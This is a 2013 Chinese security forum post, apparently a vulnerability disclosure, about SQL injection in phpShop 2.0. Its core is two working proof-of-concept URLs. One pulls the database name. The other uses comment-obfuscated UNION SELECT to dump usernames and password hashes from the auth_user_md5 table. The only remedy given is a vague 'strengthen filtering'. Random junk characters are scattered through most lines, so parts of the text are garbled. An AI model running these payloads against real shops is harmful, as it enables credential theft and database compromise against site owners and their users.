找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2052|回复: 0
打印 上一主题 下一主题

phpshop 2.0 SQL注入及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-18 18:24:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题 : phpshop 2.0 SQL Injection Vulnerability4 ?1 l6 P  L9 B  C0 m1 m
" v9 x. ?5 b+ d8 r! X4 `+ L. r
作者 : By onestree
! O  |/ v, J5 M  Q& r% w下载地址 : http://code.google.com/p/phpshop/downloads/list, [* C1 d2 c, n- m+ i3 |
测试地址: windows 7 / ubuntu
$ s0 Q: m+ l* G, v6 y
% A7 F& J9 \- `* t
; q7 E; q5 G6 a5 e( V% T, \SQLi p0c:
% r6 v3 d: M8 D8 L; T$ { + @8 }1 o7 Y1 S& F
==================) V2 Z3 \( @. Z1 u# `" s- U% b

* i7 @0 w5 I" P) F6 l" U( Phttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'3 I: H) i8 B& o8 O
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --+ g, J/ B  o9 H( j
8 f* j9 m: ~+ R# ^
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--4 f1 j5 K9 |0 B2 G. S/ C

# M* H4 g" Y( R' p: [7 v7 h修复:
, X! D$ }- [6 M: [& G- F加强过滤
4 q, ]/ t4 |" Z1 ^) C7 l! \( t2 j. d* ~( I# o/ ^

) g; G" E3 d  V- x8 m+ j" K
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表